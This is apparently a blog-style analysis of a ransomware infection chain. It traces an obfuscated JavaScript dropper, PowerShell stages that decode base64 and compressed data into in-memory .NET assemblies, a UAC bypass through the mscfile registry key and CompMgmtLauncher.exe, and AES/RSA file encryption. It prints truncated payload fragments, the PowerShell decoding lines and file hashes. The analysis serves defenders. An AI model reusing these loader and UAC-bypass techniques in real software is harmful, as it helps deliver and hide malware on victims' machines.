RANSOMWARE VIA ASSEMBLIES
SUMMARY:
[CLICK TO CHECK OUT OBFUSCATION / STAGES]
The document includes analysis of multiple layers of obfuscation used by the ransomware
THE ENTRY POINT
In this situation a JS file is the entry point. its a heavily obfuscated file with a lot of garbage code.
JS File talks to multiple IP addresses, most probably compromised domains
The JS file puts together a tmp file. This file is delimited by ‘!’
Next the payload runs powershell to formulate the next stage payload.
[System.IO.File]::ReadAllText(‘C:\Users\foo\jbsvpi.tmp’)).Replace(‘!’,’’)
On de-obfuscation, we get the following (Not all text is included)
Start-Sleep -s 32; [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“JABFAG4AQwBvAEYAaQAgA D0AIABAACcADQAKADcATAAwAEwAZABLAHYAWgBkAFIANQAyAHkASABzAHYAZQBjAGwANwA3AD QAeQB1ADcAbQBoAG0ASgBJACsAbABrAFUAZQBQAGkAYQBBAFoAdgBzAEMAWABxAHIAcgBDAGsAdw BRAEoARQBBAEIASgA4AEcAVQA3AFYAeQBBAEIAZwB1AEEARAA0AEEAVgBBAGcAdQBSAEkAagBoAF MAMQBxAHUAdgBXAHMAVgBXAHIAbABoADAANwBYAGIARwBUADEAbgBGAHIAdQAxAGEAVwBWA CsASQA2AHIAUwBOAFgAYQBhAHkAMABjAFcAdAAxADMASwBhAEoAYgBXAFYAUwB4ACsANQB5ADA AcABVADQAcwBkAHYAWQBxAFQAdgBxADMAdAAvAGUANQA1AHcAZgA0AEgAOQBIAG8AOQBoAFoA cQA2AHYATAB1AHAAcQBmACsAQgAvAG4AdABjADgAKwArADMAMwAyAHkAZQAxADgAagA3AGwAa ABqAEwAbABKAC8AMwAzADEAcQA4AGIAOABqAEoASAAvAGYAYwBSADgANwBmADkAOQBnAHYAN QA3ADQAbAAwAC8AKwA0AFQANQA2AFoARgBmAGYAUABmAFAARABHAFIALwA4AGQAMwByAEIAL
wBYADIAOAA2AGUAdABaAHEAMQBWAFAAbgBsACsAcgA5AHgAbwBOAEQAdgBQADcAMQBhAGYAYg A1ADAAMQBuAHEAOAAzAG4AawAvAG0AMQA1ADQALwBhAFYAYQBxAEwAOQArADcATgAvAG8AZQ ByAGEATwBRAE0AaQBZADcAYwBNAE8AOAA4AEoAVwAvADkANgAyADIAMwB0AGYATQA0AEwAdgB2
AEQATgB3AHgANQBqADgAYgBOAFcAWgBJAG4A ...
The above payload is de-obfuscated to the following.
$EnCoFi = @' 7L0LdKvZdR52yHsvecl774yu7mhmJI+lkUePiaAZvsCXqrrCkwQJEABJ8GU7VyABguAD4AVAguRIjhS1quvWs VWrlh07XbGT1nFru1aWV+I6rSNXaay0cWt 13KaJbWVSx+5y0pU4sdvYqTvq3t/e55wf4H9Ho9hZq6vLupqf+B/ntc8++332ye18j7lhjLlJ/331q8b8jJH/ fcR87f99gv574l0/+4T56ZFffPfPDGR/8d 3rB/X286etZq1VPnl+r9xoNDvP71afb501nq83nk/m154/aVaqL9+7N/oeraOQMiY7cMO88JW/ 96223tfM4LvvDNwx5j8bNWZInr3+Jfr9PL8c5du34Peg9
NsY/9c8fwfP+X83zEf+Hf6U/+//uj/ 4309RvctG6v3+wbBR3jF33wQsrv2P+nc7cHub7hcD9y93qhcd7veP6bh4rH3t0+OPvtxqt/boN/rGY+eB/vhoz3cf of+/3KoeN+nDu9pn1PVT176L93fztS/JN9y3QXPL/MOIMX/7h0aBE/8q/3swfsM8QX8HjLlvBt+5O/ jOvY9+eTRihj4g755DO/Tu6dHIE2ZwaOvG0NbCqhl ...
We are not quite there yet, so bear with me. This pattern is decoded by
IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EnCoFi), [IO.Compression.CompressionMode]::Decompress).
It acts on byte array i.e. 700928 bytes
Let’s continue to decode this layer (System.IO.Compression.DeflateStream). Now
we get the following, which means we still got more to decode :)
77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 35 222 218 92 0 0 0 0 0 0 0 0 224 0 2 33 11 1 11 0 0 170 10 0 0 6 0 0 0 0 0 0 254 200 10 0 0 32 0 0 0 224 10 0 0 0 0 16 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 ...
We can clearly see that there are way too many levels of obfuscation but its getting easier now. All we got to do with the above payload is to get the character representation for each integer value. After decoding we get DLL. In .Net world, code is compiled to IL executable, DLL or an assembly. Then it creates a stub for each class. Eventually the stub passes its address to JIT compiler. JIT compiles everything to machine code. Assembly is the basic packaging unit in .Net. An assembly could be an exe, a DLL, a single file or a metafile file.
So we got a DLL / assembly that is loaded by powershell.
SHA256: 6de15bd033be912148962eef88b08e29d04f5272e2f454a350076d0c62c5e600
This DLL has a class called ‘Test’ and a method called Install1
public static class Test { ...
It uses Test.MemoryLoadLibrary (BINARY STRING) to launch another assembly!!!!!
Here is the final DLL.
SHA256: 03a256ec2af4355194f494a987358c0fa9e635987b8c7b8ec3731fba8e5e443a
LOADING ASSEMBLIES:
Powershell will use [Test]::Install1() to load the assembly, where Test is the class name and Install is the method name.
AND THE FUN BEGINS:
Payload drops a .bmp image
SHA256: 34cbe464ded497a11d48817b07bf0c86cafb7f331c96c712e80663aa8afd7904
BYPASSING UAC:
Payload queries the registry by using the following functions
RegQueryValueExA
RegOpenKeyExA
It looks for:
Software\\Classes\\mscfile\\shell\\open\\command\\
After making modifications it uses ShellExecuteExA() to launch
C:\Windows\System32\CompMgmtLauncher.exe
It then uses CheckTokenMembership() to check the access token.
PAYLOAD EXECUTES THE FOLLOWING COMMANDS:
CompMgmtLauncher (Computer Management Snapin Launcher) loads a third party DLL’s if registered in registry location: SOFTWARE Classes -> shellex
I am guessing this would work on windows build that is older than 15063.
FILE ENCRYPTION:
File encryption continues from powershell’s address space. Files are encrypted with AES256 and the keys are encrypted with RSA (public key). Victim buys the private key from the hacker. Files are encrypted with .1y0pw7 extension. Wallpaper is changed to
RANSOM NOTE:
I am not sure why the note starts by saying “Welcome again”. Maybe the hacker is in the habit of compromising victim(s) more than once
LET’S LOOK AT THE OVERALL FLOW FLOW
CONCLUSION:
Its clear that the hackers are getting smarter by the day. They are using legitimate tools that could by-pass multiple security layers. I am sure they QA their work as well. Most of the attacks are staged into multiple layers of obfuscation. Payloads could be loaded in the form of assemblies by using tools like powershell. This means that the actual payload EXE is running in powershell address space. I am not sure if AV vendors can do much against such attacks.
STAY AWAY FROM RANSOMWARE